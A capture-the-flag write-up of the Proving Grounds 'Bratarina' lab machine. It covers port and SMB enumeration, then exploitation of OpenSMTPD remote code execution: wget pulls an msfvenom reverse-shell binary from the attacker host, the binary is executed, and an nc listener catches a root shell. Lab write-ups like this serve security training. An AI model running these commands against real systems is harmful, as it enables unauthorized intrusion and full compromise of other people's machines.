Offensive Security – Proving Grounds – Bratarina Write-up – No Metasploit

Offensive security has recently released a new platform for testing your technical skills called the Proving Grounds. This service comes shortly after Offensive Security acquired VulnHub. Within the proving grounds you have a choice to hack the “Play” machines for free, or pay the monthly subscription to get access to offensive security created machines. I will be going through an easy rated machine located in the “Practice” or subscription section of the site.


To start I will be doing nmap enabling all scripts, enumerating versions, and outputting all formats named “simple”.

kali@kali:~/offsec/bratarina$ nmap -sC -sV -oA simple
Starting Nmap 7.80 ( ) at 2020-09-15 19:08 EDT
Nmap scan report for
Host is up (0.060s latency).
Not shown: 995 filtered ports
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
|   256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
|_  256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
25/tcp  open   smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp  closed domain
80/tcp  open   http        nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title:         Page not found - FlaskBB        
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: BRATARINA; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: bratarina
|   NetBIOS computer name: BRATARINA\x00
|   Domain name: \x00
|   FQDN: bratarina
|_  System time: 2020-09-15T19:11:18-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-15T23:11:19
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 233.34 seconds

Here we see a share to check out. Lets kick off enum4linux.

kali@kali:~$ sudo enum4linux
Starting enum4linux v0.8.9 ( ) on Tue Sep 15 19:36:03 2020

|    Target Information    |
Target ...........
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
|    Share Enumeration on    |
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 640.

        Sharename       Type      Comment
        ---------       ----      -------
        backups         Disk      Share for backups
        IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 654.
//        Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 654.
//$   [E] Can't understand response:

The backups share seems to be available.

kali@kali:~$ smbclient //MOUNT/backups -I -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jul  6 03:46:41 2020
  ..                                  D        0  Mon Jul  6 03:46:41 2020
  passwd.bak                          N     1747  Mon Jul  6 03:46:41 2020

                10253588 blocks of size 1024. 6363480 blocks available
smb: \> cat passwd.bak
cat: command not found
smb: \> get passwd.bak
getting file \passwd.bak of size 1747 as passwd.bak (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \>

Anonymous login successful. Pull down the passwd.bak file and lets take a look.

kali@kali:~/offsec/bratarina$ cat passwd.bak
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
_smtpd:x:1001:1001:SMTP Daemon:/var/empty:/sbin/nologin
_smtpq:x:1002:1002:SMTPD Queue:/var/empty:/sbin/nologin
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

Okay we have an possible /etc/passwd backup for the machine. I enumerate a bit further using rpcclient.

kali@kali:~/offsec/bratarina$ rpcclient -U ""
Enter WORKGROUP\'s password: 
rpcclient $> enumprivs
found 9 privileges

SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SePrintOperatorPrivilege                0:4097 (0x0:0x1001)
SeAddUsersPrivilege             0:4098 (0x0:0x1002)
SeDiskOperatorPrivilege                 0:4099 (0x0:0x1003)
SeSecurityPrivilege             0:8 (0x0:0x8)
rpcclient $> lookupnames neil
neil S-1-22-1-1000 (User: 1)
rpcclient $> lookupsids S-1-22-1-1000
S-1-22-1-1000 Unix User\neil (1)

Dead end. Looking back lets check out smtpd a bit more. Kicking off a nmap targeting smtp scripts specifically.

kali@kali:~/offsec/bratarina$ nmap --script smtp-commands.nse -pT:25
Starting Nmap 7.80 ( ) at 2020-09-21 21:06 EDT
Nmap scan report for
Host is up (0.069s latency).

25/tcp open  smtp
| smtp-commands: bratarina Hello [], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP, 
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact 2.0.0 with full details 2.0.0 End of HELP info 

Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds

Weaponization and Delivery

Here we see a possible vulnerabie version of OpenSMTPD. Check searchsploit for exploits targeting this version.

kali@kali:~/offsec/bratarina$ searchsploit smtpd
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit) | windows/remote/16821.rb
Mercury/32 Mail SMTPD - Remote Stack Overrun (PoC)                 | windows/dos/
Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Remote Overflow        | windows/remote/4301.cpp
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)           | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)       | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code | openbsd/remote/
OpenSMTPD 6.6.2 - Remote Code Execution                            | linux/remote/
OpenSMTPD 6.6.3 - Arbitrary File Read                              | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Exe | openbsd/remote/48140.c
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Here we see a possible Remote Code Execution exploit “”.

kali@kali:~/offsec/bratarina$ python3 
Usage <target ip> <target port> <command>
E.g. 25 'touch /tmp/x'

Looks quite simple to use. Lets test something that will let us know its working. I think the easiest would be starting a simple HTTP server and try to pull a file from my machine.

kali@kali:~/offsec/bratarina$ python3 25 'wget'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Exploit executed without any issues.

kali@kali:~/offsec/bratarina$ sudo python3 -m http.server 80
[sudo] password for kali: 
Serving HTTP on port 80 ( ... - - [21/Sep/2020 21:20:12] "GET /trenches.txt HTTP/1.1" 200 -

Nice, we also get a connection back.


So now lets craft a useful payload that will hopefully give us a shell.

kali@kali:~/offsec/bratarina$ msfvenom -a x64 --platform Linux -p linux/x64/shell/reverse_tcp LHOST= LPORT=445 -f elf > trenches
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes

Pull the payload down and save to the /tmp folder.

kali@kali:~/offsec/bratarina$ python3 25 'wget /tmp/trenches'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Add execute permissions to the payload.

kali@kali:~/offsec/bratarina$ python3 25 'chmod +x /tmp/trenches'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Execute the payload.

kali@kali:~/offsec/bratarina$ python3 25 '/tmp/trenches'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Start listening on netcat on port 445.

kali@kali:~/offsec/bratarina$ sudo nc -lvnp 445
listening on [any] 445 ...
connect to [] from (UNKNOWN) [] 43144
uid=0(root) gid=0(root) groups=0(root)
cat "proof.txt"

Perfect. Connection established with root permissions.


Other than the SMB rabbit hole, this box was straight forward. The proving grounds offered by offensive security is starting off well. Oh, patch your services, and until next time stay safe in the Trenches of IT!